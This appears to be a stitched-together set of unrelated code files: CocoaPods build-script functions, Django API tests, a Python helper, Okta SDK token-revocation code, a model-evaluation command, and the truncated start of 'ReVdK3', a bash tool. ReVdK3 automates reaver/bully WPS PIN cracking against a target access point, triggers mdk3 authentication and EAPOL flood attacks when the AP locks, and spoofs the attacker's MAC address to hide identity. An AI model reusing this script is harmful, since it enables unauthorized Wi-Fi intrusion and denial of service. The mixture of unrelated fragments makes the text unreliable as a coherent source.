# Strip invalid architectures: removes from $1 (in place, via lipo) every
# architecture that is not in the current build's $ARCHS. Communicates its
# outcome through STRIP_BINARY_RETVAL rather than a return code.
strip_invalid_archs() {
  binary="$1"
  warn_missing_arch=${2:-true}
  # Get architectures for current target binary
  binary_archs="$(lipo -info "$binary" | rev | cut -d ':' -f1 | awk '{$1=$1;print}' | rev)"
  # Intersect them with the architectures we are building for
  intersected_archs="$(echo ${ARCHS[@]} ${binary_archs[@]} | tr ' ' '\n' | sort | uniq -d)"
  # If there are no archs supported by this binary then warn the user
  if [[ -z "$intersected_archs" ]]; then
    if [[ "$warn_missing_arch" == "true" ]]; then
      echo "warning: [CP] Vendored binary '$binary' contains architectures ($binary_archs) none of which match the current build architectures ($ARCHS)."
    fi
    STRIP_BINARY_RETVAL=1
    return
  fi
  stripped=""
  for arch in $binary_archs; do
    if ! [[ "${ARCHS}" == *"$arch"* ]]; then
      # Strip non-valid architectures in-place
      lipo -remove "$arch" -output "$binary" "$binary"
      stripped="$stripped $arch"
    fi
  done
  if [[ "$stripped" ]]; then
    echo "Stripped $binary of architectures:$stripped"
  fi
  STRIP_BINARY_RETVAL=0
}
# Copies the bcsymbolmap files of a vendored framework into
# BUILT_PRODUCTS_DIR.
# NOTE(review): the inner quotes in this echo are not escaped (unlike the
# sibling functions), so the logged command text differs slightly from the
# executed one; the rsync itself is unaffected.
install_bcsymbolmap() {
    local bcsymbolmap_path="$1"
    local destination="${BUILT_PRODUCTS_DIR}"
    echo "rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter "- CVS/" --filter "- .svn/" --filter "- .git/" --filter "- .hg/" --filter "- Headers" --filter "- PrivateHeaders" --filter "- Modules" "${bcsymbolmap_path}" "${destination}""
    rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter "- CVS/" --filter "- .svn/" --filter "- .git/" --filter "- .hg/" --filter "- Headers" --filter "- PrivateHeaders" --filter "- Modules" "${bcsymbolmap_path}" "${destination}"
}
# Signs a framework with the provided identity when the build settings
# require/allow code signing; signing runs in the background when
# COCOAPODS_PARALLEL_CODE_SIGN is "true" (callers `wait` at the end).
code_sign_if_enabled() {
  if [ -n "${EXPANDED_CODE_SIGN_IDENTITY:-}" -a "${CODE_SIGNING_REQUIRED:-}" != "NO" -a "${CODE_SIGNING_ALLOWED}" != "NO" ]; then
    # Use the current code_sign_identity
    echo "Code Signing $1 with Identity ${EXPANDED_CODE_SIGN_IDENTITY_NAME}"
    local code_sign_cmd="/usr/bin/codesign --force --sign ${EXPANDED_CODE_SIGN_IDENTITY} ${OTHER_CODE_SIGN_FLAGS:-} --preserve-metadata=identifier,entitlements '$1'"

    if [ "${COCOAPODS_PARALLEL_CODE_SIGN}" == "true" ]; then
      code_sign_cmd="$code_sign_cmd &"
    fi
    echo "$code_sign_cmd"
    eval "$code_sign_cmd"
  fi
}
# Install the pods' frameworks for the active configuration. Debug and
# Release currently embed the same set.
if [[ "$CONFIGURATION" == "Debug" ]]; then
  install_framework "${BUILT_PRODUCTS_DIR}/AFNetworking/AFNetworking.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/SVProgressHUD/SVProgressHUD.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/wendyLib/wendyLib.framework"
fi
if [[ "$CONFIGURATION" == "Release" ]]; then
  install_framework "${BUILT_PRODUCTS_DIR}/AFNetworking/AFNetworking.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/SVProgressHUD/SVProgressHUD.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/wendyLib/wendyLib.framework"
fi
# Wait for any backgrounded codesign jobs started by code_sign_if_enabled.
if [ "${COCOAPODS_PARALLEL_CODE_SIGN}" == "true" ]; then
  wait
fi
|
from datetime import date
from django.urls import reverse
from rest_framework import status
from rest_framework.test import APITestCase
from core.models import FileDownload
from core.tests.utils import make_test_users
from mtp_auth.tests.utils import AuthTestCaseMixin
BANK_STATEMENT_LABEL = 'BANK_STATEMENT'
class CreateFileDownloadTestCase(AuthTestCaseMixin, APITestCase):
    """Tests for POST filedownload-list: recording that a file was downloaded."""
    fixtures = ['initial_types.json', 'test_prisons.json', 'initial_groups.json']

    def setUp(self):
        super().setUp()
        test_users = make_test_users()
        # Requests below authenticate as a bank admin user.
        self.bank_admins = test_users['bank_admins']

    def test_create_file_download_succeeds(self):
        # A valid label + date creates exactly one FileDownload record.
        user = self.bank_admins[0]
        new_file_download = {
            'label': BANK_STATEMENT_LABEL,
            'date': date.today()
        }
        response = self.client.post(
            reverse('filedownload-list'), data=new_file_download, format='json',
            HTTP_AUTHORIZATION=self.get_http_authorization_for_user(user)
        )
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)

        file_downloads = FileDownload.objects.all()
        self.assertEqual(file_downloads.count(), 1)
        self.assertEqual(file_downloads[0].label, BANK_STATEMENT_LABEL)
        self.assertEqual(file_downloads[0].date, date.today())

    def test_create_file_download_only_allows_one_per_label_per_date(self):
        # Posting the same (label, date) pair twice: first succeeds, second
        # is rejected with 400 and no extra record is created.
        user = self.bank_admins[0]
        download_date = date.today()
        new_file_download = {
            'label': BANK_STATEMENT_LABEL,
            'date': download_date
        }
        response = self.client.post(
            reverse('filedownload-list'), data=new_file_download, format='json',
            HTTP_AUTHORIZATION=self.get_http_authorization_for_user(user)
        )
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)

        new_file_download = {
            'label': BANK_STATEMENT_LABEL,
            'date': download_date
        }
        response = self.client.post(
            reverse('filedownload-list'), data=new_file_download, format='json',
            HTTP_AUTHORIZATION=self.get_http_authorization_for_user(user)
        )
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)

        file_downloads = FileDownload.objects.all()
        self.assertEqual(file_downloads.count(), 1)
        self.assertEqual(file_downloads[0].label, BANK_STATEMENT_LABEL)
        self.assertEqual(file_downloads[0].date, download_date)
class MissingFileDownloadTestCase(AuthTestCaseMixin, APITestCase):
    """Tests for the 'filedownload-missing' endpoint.

    The endpoint accepts a ``label`` and a list of ``date`` query parameters
    and responds with the subset of those dates for which no FileDownload
    record with that label exists.
    """
    fixtures = ['initial_types.json', 'test_prisons.json', 'initial_groups.json']

    def setUp(self):
        """Create the standard test users; only bank admins are used here."""
        super().setUp()
        test_users = make_test_users()
        self.bank_admins = test_users['bank_admins']

    def _create_existing_file_downloads(self):
        """Seed bank statement downloads for 5, 6, 8 and 10 Feb 2018.

        7 and 9 Feb are deliberately absent, and 5 Feb is the earliest record.
        """
        FileDownload(label=BANK_STATEMENT_LABEL, date=date(2018, 2, 5)).save()
        FileDownload(label=BANK_STATEMENT_LABEL, date=date(2018, 2, 6)).save()
        FileDownload(label=BANK_STATEMENT_LABEL, date=date(2018, 2, 8)).save()
        FileDownload(label=BANK_STATEMENT_LABEL, date=date(2018, 2, 10)).save()

    def test_missing_file_downloads_returned(self):
        """Requested dates with no matching record are reported as missing."""
        user = self.bank_admins[0]
        self._create_existing_file_downloads()
        params = {
            'label': BANK_STATEMENT_LABEL,
            'date': ['2018-02-06', '2018-02-07', '2018-02-08', '2018-02-09']
        }
        response = self.client.get(
            reverse('filedownload-missing'), params, format='json',
            HTTP_AUTHORIZATION=self.get_http_authorization_for_user(user)
        )
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(
            response.json(),
            {'missing_dates': ['2018-02-07', '2018-02-09']}
        )

    def test_empty_response_for_all_present(self):
        """No missing dates are reported when every requested date exists."""
        user = self.bank_admins[0]
        self._create_existing_file_downloads()
        params = {
            'label': BANK_STATEMENT_LABEL,
            'date': ['2018-02-05', '2018-02-06']
        }
        response = self.client.get(
            reverse('filedownload-missing'), params, format='json',
            HTTP_AUTHORIZATION=self.get_http_authorization_for_user(user)
        )
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(
            response.json(),
            {'missing_dates': []}
        )

    def test_error_for_invalid_date(self):
        """A malformed date string ('201-02-06') yields a 400 response."""
        user = self.bank_admins[0]
        self._create_existing_file_downloads()
        params = {
            'label': BANK_STATEMENT_LABEL,
            'date': ['2018-02-05', '201-02-06']
        }
        response = self.client.get(
            reverse('filedownload-missing'), params, format='json',
            HTTP_AUTHORIZATION=self.get_http_authorization_for_user(user)
        )
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)

    def test_error_for_missing_label(self):
        """Omitting the 'label' parameter yields a 400 response."""
        user = self.bank_admins[0]
        self._create_existing_file_downloads()
        params = {
            'date': ['2018-02-05', '2018-02-06']
        }
        response = self.client.get(
            reverse('filedownload-missing'), params, format='json',
            HTTP_AUTHORIZATION=self.get_http_authorization_for_user(user)
        )
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)

    def test_error_for_missing_dates(self):
        """Omitting the 'date' parameter(s) yields a 400 response."""
        user = self.bank_admins[0]
        self._create_existing_file_downloads()
        params = {
            'label': BANK_STATEMENT_LABEL
        }
        response = self.client.get(
            reverse('filedownload-missing'), params, format='json',
            HTTP_AUTHORIZATION=self.get_http_authorization_for_user(user)
        )
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)

    def test_cuts_off_at_earliest_record(self):
        """Dates before the earliest existing record are not reported missing.

        2018-02-03 and 2018-02-04 precede the earliest record (2018-02-05),
        so only 07 and 09 Feb appear in the result.
        """
        user = self.bank_admins[0]
        self._create_existing_file_downloads()
        params = {
            'label': BANK_STATEMENT_LABEL,
            'date': [
                '2018-02-03', '2018-02-04', '2018-02-05', '2018-02-06',
                '2018-02-07', '2018-02-08', '2018-02-09'
            ]
        }
        response = self.client.get(
            reverse('filedownload-missing'), params, format='json',
            HTTP_AUTHORIZATION=self.get_http_authorization_for_user(user)
        )
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(
            response.json(),
            {'missing_dates': ['2018-02-07', '2018-02-09']}
        )

    def test_returns_empty_if_no_records_with_label_exist(self):
        """With no records at all for the label, nothing is reported missing."""
        user = self.bank_admins[0]
        params = {
            'label': BANK_STATEMENT_LABEL,
            'date': [
                '2018-02-03', '2018-02-04', '2018-02-05', '2018-02-06',
                '2018-02-07', '2018-02-08', '2018-02-09'
            ]
        }
        response = self.client.get(
            reverse('filedownload-missing'), params, format='json',
            HTTP_AUTHORIZATION=self.get_http_authorization_for_user(user)
        )
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(
            response.json(),
            {'missing_dates': []}
        )
|
def calculate_sum_of_multiples(variables, multiple):
    """Sum the values of variables whose trailing number is a multiple of `multiple`.

    The number is taken from the end of each variable name (e.g. ``"var12"`` ->
    12). Unlike a fixed ``name[3:]`` slice, this works for any prefix length,
    so ``"x5"`` and ``"count10"`` are handled as well as ``"var3"``.

    Args:
        variables: Mapping of variable names ending in digits to numeric values.
        multiple: Divisor used for the multiple test (must be non-zero).

    Returns:
        The sum of the values whose name's trailing number is divisible by
        `multiple`; 0 for an empty mapping.

    Raises:
        ValueError: If a variable name has no trailing number.
        ZeroDivisionError: If `multiple` is 0.
    """
    import re  # local import keeps this snippet self-contained

    sum_of_multiples = 0
    for var_name, value in variables.items():
        match = re.search(r'(\d+)$', var_name)
        if match is None:
            raise ValueError(f"variable name {var_name!r} has no trailing number")
        if int(match.group(1)) % multiple == 0:
            sum_of_multiples += value
    return sum_of_multiples
/*!
* Copyright (c) 2015-present, Okta, Inc. and/or its affiliates. All rights reserved.
* The Okta software accompanied by this notice is provided pursuant to the Apache License, Version 2.0 (the "License.")
*
* You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0.
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
*
* See the License for the specific language governing permissions and limitations under the License.
*
*/
/* eslint complexity:[0,8] */
import http from '../http';
import { toQueryString } from '../util';
import {
getOAuthUrls,
} from './util/oauth';
import { btoa } from '../crypto';
import AuthSdkError from '../errors/AuthSdkError';
import {
OktaAuth,
RevocableToken,
AccessToken,
RefreshToken
} from '../types';
// refresh tokens have precedence to be revoked if no token is specified
export function revokeToken(sdk: OktaAuth, token: RevocableToken): Promise<any> {
return Promise.resolve()
.then(function () {
var accessToken: string;
var refreshToken: string;
if (token) {
accessToken = (token as AccessToken).accessToken;
refreshToken = (token as RefreshToken).refreshToken;
}
if(!accessToken && !refreshToken) {
throw new AuthSdkError('A valid access or refresh token object is required');
}
var clientId = sdk.options.clientId;
var clientSecret = sdk.options.clientSecret;
if (!clientId) {
throw new AuthSdkError('A clientId must be specified in the OktaAuth constructor to revoke a token');
}
var revokeUrl = getOAuthUrls(sdk).revokeUrl;
var args = toQueryString({
// eslint-disable-next-line camelcase
token_type_hint: refreshToken ? 'refresh_token' : 'access_token',
token: refreshToken || accessToken,
}).slice(1);
var creds = clientSecret ? btoa(`${clientId}:${clientSecret}`) : btoa(clientId);
return http.post(sdk, revokeUrl, args, {
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
'Authorization': 'Basic ' + creds
}
});
});
} |
# Evaluate the 512+512+512-N-VB language model on the WikiText-103 raw
# validation set (batch size 1, drop last partial batch), applying the
# "shuffle and keep only nouns in first/third/sixth" augmentation and
# scoring only the last sixth of each sequence.
python transformers/examples/language-modeling/run_language_modeling.py --model_name_or_path train-outputs/512+512+512-N-VB/model --tokenizer_name model-configs/1536-config --eval_data_file ../data/wikitext-103-raw/wiki.valid.raw --output_dir eval-outputs/512+512+512-N-VB/512+512+512-shuffled-N-256 --do_eval --per_device_eval_batch_size 1 --dataloader_drop_last --augmented --augmentation_function shuffle_remove_all_but_nouns_first_third_sixth --eval_function last_sixth_eval |
#!/bin/bash
# ReVdK3 (revision 2): automates reaver/bully WPS pin attacks combined with
# mdk3 flood attacks against access points that lock WPS for long periods.

# Declare all globals up front so their later use is explicit.
declare MAC;
declare PIN_TIME;
declare WLAN;
declare MON1;
declare MON2;
declare MON3;
declare PHY_OF_WLAN_1;
declare NO_OF_MONITOR_INTERFACES_CHECK;
declare MONITOR_INTERFACES;
declare STOP_INTERFACE;
declare VARIABLE;
declare CHANNEL;
declare DISTANCE_BETWEEN_PINS;
declare TIMEOUT;
declare ESSID;
# Pre-seeded to 'r' so the configuration wizard loops run at least once.
declare SATISFIED_OPTION=r;
declare REAVER_COMMAND_LINE;
declare MDK3_MAIN_MENU_OPTION;
declare RETURN_OPTION_FOR_AUTH_DOS_FOR_AUTH_DOS;
declare RETURN_OPTION_FOR_EAPOL_START_FLOOD;
declare EAPOL_START_FLOOD_COMMAND;
declare AUTH_DOS_FLOOD_COMMAND;
declare RETURN_OPTION_FOR_EAPOL_LOG_OFF_FLOOD;
declare EAPOL_LOG_OFF_FLOOD_COMMAND;
declare VARIABLE_CHECK_FOR_RATE_LIMITING;
declare TARGET_STATION;
declare MDK3_KILLALL_1
declare AIREPLAY_KILLALL;
declare SUCCESSIVE_EAPOL_FAILURES;
declare AIREPLAY_RESET;
declare MONITOR_INTERFACES_CHECK;
declare GO_STATUS;
declare NO_GO_STATUS
clear
# Coloured status markers used by the dependency report below.
GO_STATUS=`echo -e "\e[31m[\e[34mAffirmative\e[31m]\e[0m"`
NO_GO_STATUS=`echo -e "\e[31m[\e[33mNegative\e[31m]\e[0m"`
# Resolve each required external tool; an empty result means it is missing.
REAVER_CHECK=`which reaver`
BULLY_CHECK=`which bully`
MDK3_CHECK=`which mdk3`
AIREPLAY_NG_CHECK=`which aireplay-ng`
GNOME_TERMINAL_CHECK=`which gnome-terminal`
TIMEOUT_CHECK=`which timeout`
# Report which required tools are present, then abort if any hard
# requirement (mdk3, aireplay-ng, gnome-terminal, timeout) is missing.
# reaver/bully availability is checked later, when the user picks a cracker.
echo -e "\e[36mChecking to see if the following programs are installed";
echo -e "\e[36mProgram Exist?"
echo -ne "\e[36m[1] reaver";
if [ -z "$REAVER_CHECK" ]; then
echo -e " $NO_GO_STATUS";
else
echo -e " $GO_STATUS";
fi
sleep 0.2
echo -ne "\e[36m[2] bully";
if [ -z "$BULLY_CHECK" ]; then
echo -e " $NO_GO_STATUS";
else
echo -e " $GO_STATUS";
fi
sleep 0.2
echo -ne "\e[36m[3] mdk3";
if [ -z "$MDK3_CHECK" ]; then
echo -e " $NO_GO_STATUS";
else
echo -e " $GO_STATUS";
fi
sleep 0.2
echo -ne "\e[36m[4] aireplay-ng";
if [ -z "$AIREPLAY_NG_CHECK" ]; then
echo -e " $NO_GO_STATUS";
else
echo -e " $GO_STATUS";
fi
sleep 0.2
echo -ne "\e[36m[5] gnome-terminal";
if [ -z "$GNOME_TERMINAL_CHECK" ]; then
echo -e " $NO_GO_STATUS";
else
echo -e " $GO_STATUS";
fi
sleep 0.2
# Fix: this entry was mislabelled "[5]", duplicating gnome-terminal's number.
echo -ne "\e[36m[6] timeout";
if [ -z "$TIMEOUT_CHECK" ]; then
echo -e " $NO_GO_STATUS";
else
echo -e " $GO_STATUS";
fi
sleep 0.2
if [ -z "$MDK3_CHECK" ]; then
echo -e "\e[31m\e[1mmdk3 is not installed.Exiting script...";
exit
fi
if [ -z "$AIREPLAY_NG_CHECK" ]; then
echo -e "\e[31m\e[1maireplay-ng is not installed.Exiting script...";
exit
fi
if [ -z "$GNOME_TERMINAL_CHECK" ]; then
echo -e "\e[31m\e[1mgnome-terminal is not installed.Exiting script...";
exit
fi
if [ -z "$TIMEOUT_CHECK" ]; then
echo -e "\e[31m\e[1mtimeout is not installed.Exiting script...";
exit
fi
clear
# Welcome banner
echo -e "\e[36m\e[1m###########################\e[0m";
echo -e "\e[36m\e[1m# WELCOME TO ReVdK3 Script# \e[35m\e[1mC\e[92m\e[1mR\e[91m\e[1mE\e[34m\e[1mA\e[33m\e[1mT\e[96m\e[1mE\e[35m\e[1mD \e[92m\e[1mB\e[35m\e[1mY\e[0m : \e[35m\e[1mR\e[92m\e[1mE\e[91m\e[1mP\e[34m\e[1mZ\e[33m\e[1mE\e[96m\e[1mR\e[35m\e[1mO\e[92m\e[1mW\e[91m\e[1mO\e[34m\e[1mR\e[33m\e[1mL\e[96m\e[1mD\e[35m\e[1m\e[0m";
echo -e "\e[36m\e[1m###########################\e[0m";
echo -e "\e[36m\e[1m#####################################################################\e[0m";
echo -e "\e[36m\e[1m# This Script allows you to use reaver and an mdk3 flood attack that#\e[0m";
echo -e "\e[36m\e[1m# you choose #\e[0m";
echo -e "\e[36m\e[1m#####################################################################\e[0m";
echo -e "\e[36m\e[1m# This Script was created for Access Points that locks up for long #\e[0m";
echo -e "\e[36m\e[1m# periods of time. It works by starting reaver and continously #\e[0m";
echo -e "\e[36m\e[1m# detect when reaver is rate limiting pins, once reaver detects #\e[0m";
echo -e "\e[36m\e[1m# the AP is rate limiting pins, it starts mdk3 attacks. mdk3 attacks#\e[0m";
echo -e "\e[36m\e[1m# are killed once reaver detects that the AP has unlocked itself ! #\e[0m";
echo -e "\e[36m\e[1m# The prcoess goes on... #\e[0m";
echo -e "\e[36m\e[1m#####################################################################\e[0m";
echo ;
echo -e "\e[37m\e[44m\e[1m ReVdK3.sh-r2 (Revision 2)\e[0m";
echo ;
echo -e "\e[37m\e[44m\e[1mWHAT'S NEW?:Incorporating bully into the script\e[0m";
echo ;
echo -e "\e[37m\e[44m\e[1mThanks to N1ksan for some useful ideas!\e[0m";
echo ;
echo -e "\e[36m\e[40m\e[1m******************************************************\e[0m";
echo -e "\e[36m\e[40m\e[1m* Welcome: I need to verify your wireless interface *\e[0m";
echo -e "\e[36m\e[40m\e[1m******************************************************\e[0m";
echo ;
# Prompt for the wireless interface and validate it against airmon-ng's
# interface list; re-prompt until a known interface is entered.
read -p "Which wireless interface you will be using? e.g wlan1, wlan2 etc": WLAN;
EXISTENCE_OF_WLAN=`airmon-ng|grep ''"$WLAN"|cut -f1`;
while [ -z "$WLAN" -o "$EXISTENCE_OF_WLAN" != "$WLAN" ]; do
echo -e "\e[31m\e[1mYou input a wireless interface that doesn't exist!\e[0m";
echo ;
read -p "Which wireless interface you will be using? e.g wlan1, wlan2 etc": WLAN;
EXISTENCE_OF_WLAN=`airmon-ng|grep ''"$WLAN"|cut -f1`;
done
# Identify the phy backing the chosen interface and any interfaces on it.
PHY_OF_WLAN_1=`airmon-ng|grep $WLAN|cut -d ' ' -f4`;
NO_OF_MONITOR_INTERFACES_CHECK=`airmon-ng|grep -F "$PHY_OF_WLAN_1"|wc -l`;
MONITOR_INTERFACES=`airmon-ng|grep -F "$PHY_OF_WLAN_1"|cut -f1|tr -s [:space:] ' '`;
echo -e "\e[36m\e[1mKilling any existing monitor interface(s) on $WLAN\e[0m";
# Stop stale monitor interfaces on the same phy, but never the wlan itself.
if [ "$NO_OF_MONITOR_INTERFACES_CHECK" != 1 ]; then
for STOP_INTERFACE in $MONITOR_INTERFACES; do
if [ "$STOP_INTERFACE" != "$WLAN" ]; then
airmon-ng stop $STOP_INTERFACE > /dev/null;
fi
done
fi
echo -e "\e[36m\e[1mSuccessful!\e[0m";
echo -e "\e[36m\e[1mStarting three new monitor modes...\e[0m";
# Create three monitor-mode interfaces; MON1 is used by the pin cracker
# (reaver/bully) and all three are used by the mdk3 flood attacks.
MON1=`airmon-ng start $WLAN|grep -F '(monitor mode enabled on '|tr -s [:space:] ' '|cut -d ' ' -f6|tr -d ')'`
MON2=`airmon-ng start $WLAN|grep -F '(monitor mode enabled on '|tr -s [:space:] ' '|cut -d ' ' -f6|tr -d ')'`
MON3=`airmon-ng start $WLAN|grep -F '(monitor mode enabled on '|tr -s [:space:] ' '|cut -d ' ' -f6|tr -d ')'`
echo "Successful!"
# On interrupt, hangup or normal exit: remove temp files, kill child attack
# processes (mdk3/reaver/bully/aireplay/tail) and tear down all three
# monitor interfaces so the adapter is left in a clean state.
trap 'echo -e "\n\e[36m\e[1mCleaning up all temporary files created by this script..good house keeping...ensuring all processes are killed!\e[31m\e[0m";
killall -1 ReVdK3-r2.sh;killall mdk3 2> /dev/null; killall -9 reaver 2> /dev/null;killall -9 bully 2> /dev/null; killall tail 2> /dev/null; rm -f /etc/reaver_tmp.txt 2> /dev/null;
rm -f /etc/bully_tmp.txt 2> /dev/null; airmon-ng stop "$MON1" > /dev/null; airmon-ng stop "$MON2" > /dev/null; airmon-ng stop "$MON3" > /dev/null;
killall aireplay-ng 2> /dev/null;rm -f /etc/aireplay_tmp.txt 2> /dev/null;killall -9 ReVdK3-r2.sh > /dev/null;' SIGINT SIGHUP EXIT
clear
# Interactive wizard that gathers the target MAC/ESSID and optional reaver
# switches (-c channel, -d pin delay, -t timeout), spoofs the adapter MAC,
# then assembles REAVER_COMMAND_LINE. Re-runs while the user answers 'r'
# (SATISFIED_OPTION is pre-seeded to 'r' at the top of the script).
function REAVER_COMMAND_LINE_OPTIONS {
while [ "$SATISFIED_OPTION" = r ]; do
clear
echo ;
echo -e "\e[36m\e[40m\e[1m***********************************\e[0m";
echo -e "\e[36m\e[40m\e[1m*Welcome to Reaver's configuration*\e[0m";
echo -e "\e[36m\e[40m\e[1m***********************************\e[0m";
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx MAC ADDRESS OF AP x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
# Target MAC is mandatory; keep prompting until non-empty.
read -p "What is the mac address of the access point you are targeting?": MAC;
while [ -z "$MAC" ]; do
echo -e "\e[31m\e[1mYou need to input the target's MAC address\e[0m";
echo ;
read -p "What is the mac address of the access point you are targeting?": MAC;
done
echo "MAC address saved...";
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx ESSID OF AP x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
# ESSID is mandatory too (used by aireplay-ng / mdk3 eapol attacks later).
read -p "What is the essid of the access point you are targeting": ESSID;
while [ -z "$ESSID" ]; do
echo -e "\e[31m\e[1mYou need to input the target's ESSID when running aireplay-ng &/or running mdk3 eapol start flood attacks!\e[0m";
echo ;
read -p "What is the essid of the access point you are targeting": ESSID;
done
echo "ESSID saved...";
echo -e "\e[36m\e[1mI am hiding your identity by changing your mac\e[0m";
sleep 2;
# Spoof a fixed MAC on the wlan and all three monitor interfaces.
# Interfaces must be down for macchanger; the repeated down/up calls are
# belt-and-braces to ensure the state change takes effect.
ifconfig $WLAN down;
ifconfig $WLAN down;
ifconfig $WLAN down;
ifconfig $MON1 down;
ifconfig $MON1 down;
ifconfig $MON2 down;
ifconfig $MON2 down;
ifconfig $MON3 down;
ifconfig $MON3 down;
macchanger -m '78:03:40:02:94:8f' "$WLAN"> /dev/null;
macchanger -m '78:03:40:02:94:8f' "$MON1"> /dev/null;
macchanger -m '78:03:40:02:94:8f' "$MON2"> /dev/null;
macchanger -m '78:03:40:02:94:8f' "$MON3"> /dev/null;
ifconfig $MON1 up;
ifconfig $MON1 up;
ifconfig $MON2 up;
ifconfig $MON2 up;
ifconfig $MON3 up;
ifconfig $MON3 up;
echo;
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx Reaver's Options x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx x\e[0m";
echo -e "\e[36m\e[40m\e[1mx[1] Channel Option (-c) x\e[0m";
echo -e "\e[36m\e[40m\e[1mx(note: Some Access Point hop to another channel when they reboot! x\e[0m";
echo -e "\e[36m\e[40m\e[1mx............................................................................x\e[0m";
echo -e "\e[36m\e[40m\e[1mx[2] Timeout Option (-t) x\e[0m";
echo -e "\e[36m\e[40m\e[1mx(Reaver's time to wait for a message from the AP) x\e[0m";
echo -e "\e[36m\e[40m\e[1mx............................................................................x\e[0m";
echo -e "\e[36m\e[40m\e[1mx[3] Reaver's time between pin (-d) x\e[0m";
echo -e "\e[36m\e[40m\e[1mx x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
#CHANNEL CHAIN
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx CHANNEL SWITCH x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
# Optional channel: empty (ENTER) or 1-16, validated by extglob pattern.
read -p "What channel you want reaver listen on (-c flag), or press ENTER to use default reaver's option": CHANNEL;
while [[ "$CHANNEL" != @(1|2|3|4|5|6|7|8|9|10|11|12|13|14|15|16|) ]]; do
echo -e "\e[31m\e[1mYou need to input a channel number between 1-16\e[0m";
echo ;
read -p "What channel you want reaver listen on (-c flag), or press ENTER to use default reaver's option": CHANNEL;
done
#DISTANCE BETWEEN PIN ATTEMPTS CHAIN
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx PIN DELAY SWITCH x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
# Optional -d value: the bracket pattern rejects anything that does not
# start like a positive number (letters, symbols, leading 0/-).
read -p "How much time in seconds for distance between pin attempts? (-d flag), if you want to use default option press ENTER ": DISTANCE_BETWEEN_PINS
while [[ $DISTANCE_BETWEEN_PINS = ["-"A-Za-qs-z'`''~''@''#''$''%''^''&''*''('')''_''+''=''|''['']''{''}''\'"'"'"'';'':'',''.''<''>''/''?'' *''0']* ]]; do
echo -e "\e[31m\e[1mYou need to choose a postive number!\e[0m";
echo ;
read -p "How much time in seconds for distance between pin attempts? (-d flag), if you want to use default option press ENTER ": DISTANCE_BETWEEN_PINS
done
#TIME OUT CHAIN
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx TIMEOUT SWITCH x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
# Optional -t value, validated the same way as the pin delay.
read -p "How much time in seconds for reaver to timeout if the AP doesn't respond? (-t flag), if you want to use default option press ENTER": TIMEOUT;
while [[ $TIMEOUT = ["-"A-Za-qs-z'`''~''@''#''$''%''^''&''*''('')''_''+''=''|''['']''{''}''\'"'"'"'';'':'',''.''<''>''/''?'' *''0']* ]]; do
echo -e "\e[31m\e[1mYou need to choose a postive number!\e[0m";
echo ;
read -p "How much time in seconds for reaver to timeout if the AP doesn't respond? (-t flag), if you want to use default
option press ENTER": TIMEOUT;
echo ;
done
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
